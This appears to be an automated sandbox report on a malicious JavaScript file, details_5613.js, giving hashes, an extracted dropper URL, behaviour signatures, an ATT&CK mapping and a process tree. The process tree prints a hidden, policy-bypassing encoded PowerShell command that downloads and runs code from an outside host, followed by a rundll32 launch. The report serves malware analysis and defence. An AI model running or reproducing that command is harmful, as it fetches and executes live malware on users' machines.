Overview

overview

10

Static

static

details_5613.js

windows7_x64

10

details_5613.js

windows10_x64

10

Analysis

  • max time kernel
    838s
  • max time network
    840s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    26-07-2021 21:18

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    details_5613.js

  • Size

    629KB

  • MD5

    13ecfbc54efb87498df12bbb02d054ef

  • SHA1

    c857c59ef9fae1eaf4c3d1f8389586b2bc8ea8c6

  • SHA256

    c91bd39590ae41161fc8d4ae9a453f689512ab90a0cc405d00dc9a50db05ea33

  • SHA512

    5993d9c9343c041162f779196fc7a5fea688c1d922d940ca7adf62e4deb683a6104b4299d89f4c5ab05fc1384e7aeeb4e229ce8aed503baa73982c1b8176992d

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://netvalleykenya.com/crm.php

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\details_5613.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1052
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbgBlAHQAdgBhAGwAbABlAHkAawBlAG4AeQBhAC4AYwBvAG0ALwBjAHIAbQAuAHAAaABwACIAKQA=
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1424
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbgBlAHQAdgBhAGwAbABlAHkAawBlAG4AeQBhAC4AYwBvAG0ALwBjAHIAbQAuAHAAaABwACIAKQA=
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1792
        • C:\Windows\System32\rundll32.exe
          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\glSbzLwAdKQN.bin StartW
          4⤵
            PID:828

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Credential Access

    Discovery

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/828-70-0x0000000000000000-mapping.dmp
      Download
    • memory/1424-60-0x0000000000000000-mapping.dmp
      Download
    • memory/1792-61-0x0000000000000000-mapping.dmp
      Download
    • memory/1792-62-0x000007FEFBB41000-0x000007FEFBB43000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1792-63-0x0000000002370000-0x0000000002371000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1792-64-0x000000001ABF0000-0x000000001ABF1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1792-65-0x000000001A8C0000-0x000000001A8C1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1792-66-0x000000001AB70000-0x000000001AB72000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1792-67-0x000000001AB74000-0x000000001AB76000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1792-68-0x00000000023B0000-0x00000000023B1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1792-69-0x000000001C230000-0x000000001C231000-memory.dmp
      Filesize

      4KB

      Download